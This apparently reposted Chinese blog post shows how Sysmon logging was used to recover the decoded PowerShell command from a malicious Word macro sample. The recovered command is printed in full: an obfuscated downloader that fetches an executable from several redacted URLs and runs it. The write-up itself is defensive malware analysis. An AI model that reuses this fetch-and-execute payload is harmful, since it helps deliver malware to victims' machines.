使用sysmon分析宏病毒

Posted 安全工搬砖笔记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了使用sysmon分析宏病毒相关的知识,希望对你有一定的参考价值。

样本为一个Word文件,Virustotal地址:


https://www.virustotal.com/#/file/f8aede78ad92bd28f5f699b677d7d5fd362c8be846d03f009e1f04a9c3d15101/detection

动态分析可以获取Callback Server地址,但不能确定是所有Callback Server。静态分析查看Macros代码时候,发现混淆比较复杂,很难拿到最终执行的明文Powershell代码。根据经验Macros经常要么执行CMD要么执行Powershell,Sysmon又可以记录命令执行及其参数。

Sysmon 默认安装

 sysmon -accepteula  –i -n

打开Doc文件,Enable Macros,执行宏,观察Sysmon日志,获得powershell命令:

Decode 获得明文代码,恶意文件为Downloader以及确定5个URL:


iex($nsadasd = &(\'n\'+\'e\'+\'w-objec\'+\'t\') random;$YYU = .(\'ne\'+\'w\'+\'-object\') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = \' 
https://<evil>/BaW2l63/@http://<evil>/8W0D/@http://<evil>/8Y5S9/@http://<evil>/0Z6zA5Y/@http://<evil>/7fGM/\'.Split(\'@\');$SDC = $env:public + \'\\\' + $NSB + (\'.ex\'+\'e\');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&(\'Invo\'+\'k\'+\'e-Item\')($SDC);break;}catch{}})

End

以上是关于使用sysmon分析宏病毒的主要内容,如果未能解决你的问题,请参考以下文章

2019-2020 网络对抗技术 20175207 Exp4 恶意代码分析

20145306张文锦《网络对抗》恶意代码分析

2019-2020-4 网络对抗技术 20175206李得琛 Exp4 恶意代码分析

2016-2017-1 20155215 信息安全技术 补课上测试

Bro-Sysmon:一款让Bro-IDS(Bro)监视Windows端点活动的工具

计算机病毒